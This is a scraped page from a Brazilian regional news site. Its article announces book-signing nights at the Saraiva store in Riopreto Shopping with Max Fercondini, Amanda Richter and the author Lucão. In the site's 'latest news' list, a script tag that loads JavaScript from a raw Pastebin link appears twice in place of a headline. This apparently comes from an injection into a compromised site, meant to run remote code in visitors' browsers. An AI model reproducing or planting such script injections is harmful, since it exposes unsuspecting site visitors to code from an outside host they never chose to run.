ÚLTIMAS DA REDAÇÃO

  • x
    x

    CAMPANHA DE NATAL RIOPRETO SHOPPING 2020

  • <script type="text/javascript" src="https://pastebin.com/raw/qQZ4VJtT"</script>
    <script type="text/javascript" src="https://pastebin.com/raw/qQZ4VJtT"</script>

    Saraiva do Riopreto Shopping convida autores para noites de autógrafos, na semana do Dia dos Namorados

    Aproveitando o clima do Dia dos Namorados, a Saraiva do Riopreto Shopping realiza duas noites de autógrafos. Nesta quarta-feira, dia 7, com os autores do livro “América do Sul Sobre Rodas”, do casal Max Fercondini e Amanda Richter, e quinta, dia 8, com o autor dos livros “É cada coisa que escrevo só pra dizer que te amo” e “Telegrama”, Lucão.
    Depois de passarem 180 dias na estrada e desbravarem as mais belas paisagens da América do Sul em um motorhome para produção de uma série do programa Como Será?, apresentado por Sandra Annemberg, Max Fercondini e Amanda Richter, agora percorrem o Brasil para lançar o livro América do Sul Sobre Rodas. A próxima parada será na Saraiva do Riopreto Shopping nesta quarta, dia 7, às 19h, para uma noite de autógrafos.

    SEM LEGENDA

    Com todos os detalhes dessa incrível aventura, o projeto gráfico do livro é um dos mais interativos do mercado graças a tecnologia QR Code, presente em diversas páginas da obra. Seja para mostrar conteúdo exclusivo das experiências gravadas pelo casal, ou para revelar segredos das localidades visitadas, o livro despertar nos leitores o espírito de aventura e a vontade de embarcar em uma grande jornada. O livro é da editora Novo Conceito.

    SEM LEGENDA

    Já na quinta-feira, também às 19h, a Saraiva recebe o autor Lucão para um bate-papo e uma noite de autógrafos.  Ele tem 423 mil seguidores no Instagram.
    Em 2015 publicou seu primeiro livro “É cada coisa que escrevo só pra dizer que te amo”, e em 2016 publicou o segundo “Telegramas”, todos pela editora Somos Educação (Saraiva). Também é colunista do jornal O Popular, escreve quinzenalmente aos sábados na coluna Crônicas & Outras Histórias.  Às vezes, as palavras do dicionário parecem não ser suficientes para explicar sentimentos tão intensos e verdadeiros como o amor e a saudade, mas Lucão tem o dom de misturá-las de um jeito tão excepcional, que consegue dar explicações perfeitas para o coração. Em “É cada coisa que escrevo só pra dizer que te amo”, Lucão traz versos inéditos e faz uma compilação das melhores frases e poemas que publicou em seu blog – Abra o bico – ao longo de 10 anos.

    SEM LEGENDA SEM LEGENDA

    “Telegramas” é o segundo livro do autor, publicado no final de 2016, foi lançado em março de 2017. Ele explica que um telegrama, por menor que seja, é portador das mais importantes notícias — sejam elas alegres ou tristes. Assim como os telegramas são os poemas: mesmo quando pequenos, são capazes de despertar os sentimentos mais profundos em quem os lê. Em “Telegramas”, Lucão fala sobre amor, saudade, poesia e autoconhecimento, sempre com sensibilidade e delicadeza ímpares.

    SEM LEGENDA



Veja Também